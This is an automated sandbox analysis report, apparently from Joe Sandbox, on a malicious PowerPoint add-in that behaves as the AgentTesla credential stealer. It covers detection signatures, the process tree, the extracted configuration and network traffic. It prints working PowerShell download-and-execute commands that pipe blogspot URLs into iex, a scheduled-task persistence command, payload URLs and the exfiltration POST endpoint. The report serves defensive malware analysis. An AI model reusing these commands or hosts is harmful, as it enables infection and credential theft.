Loading ...

Play interactive tourEdit tour

Windows Analysis Report 3.ppam

Overview

General Information

Sample Name:3.ppam
Analysis ID:553159
MD5:df075573f3546a582d5f4c690a469d9d
SHA1:60c1884b11d4eb05f687e077adadcd749b7a488d
SHA256:4337ff8e652f6fe6b0a8d0a01a67c23764a3bf31eb9ae5fca8826f246d1de2ed
Tags:ppam
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Sigma detected: Schedule system process
Antivirus detection for URL or domain
Creates an autostart registry key pointing to binary in C:\Windows
Document contains an embedded VBA macro which may execute processes
Writes to foreign memory regions
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Uses known network protocols on non-standard ports
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
Creates autostart registry keys with suspicious values (likely registry only malware)
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: Suspicious aspnet_compiler.exe Execution
Document contains an embedded VBA macro which executes code when the document is opened / closed
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Connects to a URL shortener service
Sigma detected: Windows Suspicious Use Of Web Request in CommandLine
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • POWERPNT.EXE (PID: 5140 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" /AUTOMATION -Embedding MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cmd.exe (PID: 4964 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\3.ppam" MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • POWERPNT.EXE (PID: 5720 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou " MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
      • powershell.exe (PID: 6628 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 6028 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 15FF7D8324231381BAD48A052F85DF04)
        • aspnet_compiler.exe (PID: 1200 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 6068 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
        • aspnet_compiler.exe (PID: 5156 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe MD5: AE2C1DCC77B6ED0711330B075028D7B3)
  • powershell.exe (PID: 3660 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p26ynn.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • powershell.exe (PID: 6240 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 3860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6656 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • powershell.exe (PID: 1284 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "https://p6tbbb.blogspot.com/atom.xml" -useB|iex; MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 6288 cmdline: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex; MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000001F.00000002.595068396.0000000003491000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: aspnet_compiler.exe PID: 6068JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: aspnet_compiler.exe PID: 6068JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: Suspicious aspnet_compiler.exe ExecutionShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe, ProcessId: 1200
          Sigma detected: Windows Suspicious Use Of Web Request in CommandLineShow sources
          Source: Process startedAuthor: James Pemberton / @4A616D6573: Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE" "C:\Users\user\Desktop\3.ppam" /ou ", ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 5720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ProcessId: 6628
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132866651880071197.6628.DefaultAppDomain.powershell

          Persistence and Installation Behavior:

          barindex
          Sigma detected: Schedule system processShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -NoProfile -ExecutionPolicy Bypass -Command C:\Users\user\Pictures\notnice.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6628, ProcessCommandLine: C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 350 /tn akohijijkuhdi /F /tr "powershell -w h -NoProfile -ExecutionPolicy Bypass -Command start-sleep -s 20;iwr "\"https://p26ynn.blogspot.com/atom.xml"\" -useB|iex;, ProcessId: 6028

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 31.0.aspnet_compiler.exe.400000.4.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://207.32.217.137:8081/n/p6df/asshole/08e40c81aa01a5cf.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 3.ppamReversingLabs: Detection: 25%
          Antivirus detection for URL or domainShow sources
          Source: https://5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.com/ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txtAvira URL Cloud: Label: malware
          Source: 31.0.aspnet_compiler.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.1.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.3.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.2.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.0.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: 31.0.aspnet_compiler.exe.400000.2.unpackAvira: Label: TR/Dropper.MSIL.Gen2
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49780 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49784 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49825 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49824 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.3:49827 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 34.102.176.152:443 -> 192.168.2.3:49828 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49829 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49834 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49835 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49836 version: TLS 1.0
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

          Software Vulnerabilities:

          barindex
          Document exploit detected (process start blacklist hit)Show sources
          Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXEProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficDNS query: name: www.j.mp
          Source: global trafficTCP traffic: 192.168.2.3:49776 -> 67.199.248.17:80
          Source: global trafficTCP traffic: 192.168.2.3:49780 -> 104.16.202.237:443
          Source: powerpnt.exeMemory has grown: Private usage: 0MB later: 49MB

          Networking:

          barindex
          Uses known network protocols on non-standard portsShow sources
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 8081
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49839
          Source: unknownNetwork traffic detected: HTTP traffic on port 8081 -> 49838
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewIP Address: 104.16.202.237 104.16.202.237
          Source: Joe Sandbox ViewIP Address: 104.16.202.237 104.16.202.237
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49780 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49784 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49825 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49824 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.3:49827 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 34.102.176.152:443 -> 192.168.2.3:49828 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49829 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.3:49834 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 104.16.202.237:443 -> 192.168.2.3:49835 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 199.91.155.3:443 -> 192.168.2.3:49836 version: TLS 1.0
          Source: global trafficHTTP traffic detected: GET /file/nm9ysba5ejf20r8/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /rm83e8erdqxg/nm9ysba5ejf20r8/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=izna1o17t8hk2hcl41rskil668flg4w4Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p26ynn.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ugd/5940e4_979408a19b03449f8221c8f8d235fa55.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 5940e470-33c6-4a99-b802-7f11323388a6.usrfiles.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /u45xa78x9nkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=8gv80wkxqbda9mv7zrd52a2eanmh8cy0Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /atom.xml HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: p6tbbb.blogspot.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /file/5avuvurhf9r42y3/6.dll/file HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.mediafire.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /1rxjqgtrygkg/5avuvurhf9r42y3/6.dll HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: download2262.mediafire.comCookie: ukey=s7huv8g43j1r0etull8h9ns6aiwyny7lConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.j.mpConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /asasdjiasjdiasjasdasddik HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: bit.lyConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
          Source: global trafficHTTP traffic detected: POST /n/p6df/asshole/08e40c81aa01a5cf.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0Content-Type: application/x-www-form-urlencodedHost: 207.32.217.137:8081Content-Length: 282Expect: 100-continue
